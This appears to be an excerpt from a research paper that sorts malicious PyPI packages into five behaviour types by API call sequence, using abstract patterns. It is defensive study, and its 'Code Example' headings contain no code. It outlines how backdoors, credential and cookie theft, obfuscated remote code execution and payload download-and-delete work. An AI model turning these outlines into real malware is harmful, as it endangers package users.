An Empirical Study of Malicious Code In PyPI Ecosystem

Malicious code behaviors

We proposed a clustering method based on API call sequences to analyze and classify malicious codes. Our goal is to reveal the behavioral patterns of malware and thus identify malicious codes with similar behavioral attributes more effectively. We extract API call sequences from known malicious codes closely related to malicious behaviors to achieve this goal. These API call sequences contain essential information about how the malicious code interacts with the operating system or other software modules during execution. By clustering the sequence of API calls, we can discover the common behavior among different malicious codes. We successfully identified five categories with different malicious behaviors.

1: Remote Control

The malicious code first calls the network connection-related API function to establish a connection with the remote server. It then receives an encrypted command from the server, which is decoded using decoding-related API functions, and subsequently executed. By establishing a backdoor pipeline on a user's system, attackers can achieve persistent remote control, allowing them to continue accessing the system even after the initial attack has been eliminated. This behavior can cause long-term and sustained damage to the system.

Pattern:         S  -> Cr(IP,Port)  ->  Cr  ->  [Ce]   ->   Cs   ->  E

Code Example

2: Information Stealing

We found many malicious codes stealing sensitive information from the data collected. Malicious code collects host not only sensitive information but also information such as passwords and cookies from the user's browser, which can be used for malicious purposes. This type of malicious behavior can affect multiple systems and users. The attacker will first read sensitive local files using file operation-related API functions or system information using host information-related APIs, then may obfuscate this private information, typically using the base64() method, and finally call network connection-related APIs to send this information to a specified IP or URL.

Pattern:         S -> [Cf(Path)] ->  [Ch] ->  [Ce]  ->  Cn(URL)   ->  E

Code Example

3: Code Execution

We have discovered that some attackers use dynamic code execution at runtime to circumvent code signatures and other security measures. The malicious code can be in the form of a base64-encoded string of code that is either downloaded from a remote server or embedded within the code. The attacker first decodes the obfuscated malicious code using decoding-related API functions, then passes the decoded string to the compile() function, which compiles it into a Python code object. Finally, the attacker passes the code object to code execution-related API functions to execute the code and accomplish the attack objective.

Pattern:        S ->[Cn(URL)] ->  [Ce]  ->  [Compile] ->  Cc   ->  E

Code Example

4: Command Execution

Attackers use command execution-related API functions to execute malicious PowerShell or other shell commands to run other malicious programs, delete files, steal sensitive information, etc. The attacker may also use network connection-related API functions to send the collected information to a remote server. This attack can lead to complete system control, leading to serious data leakage and corruption.

Pattern:         S  ->  [Ce]  ->  Cs  ->   [Ce] ->  [Cn(URL)]   ->  E

Code Example

5: Unauthorised File Operation

The attacker uses the Python malicious code to connect to a remote server and download malicious executable files via remote connection-related API functions. These executables are then run on the local system by calling commands execution-related API functions. These executables may be various types of malware, such as Trojans, ransomware, password-stealing software, etc. Finally, the attacker will call file operation-related API functions to delete these executables to erase the attack's traces. 

Pattern:         S  ->  [Cn(URL)]  ->  Cf  ->   Cs  ->  [Cf]   ->  E

Code Example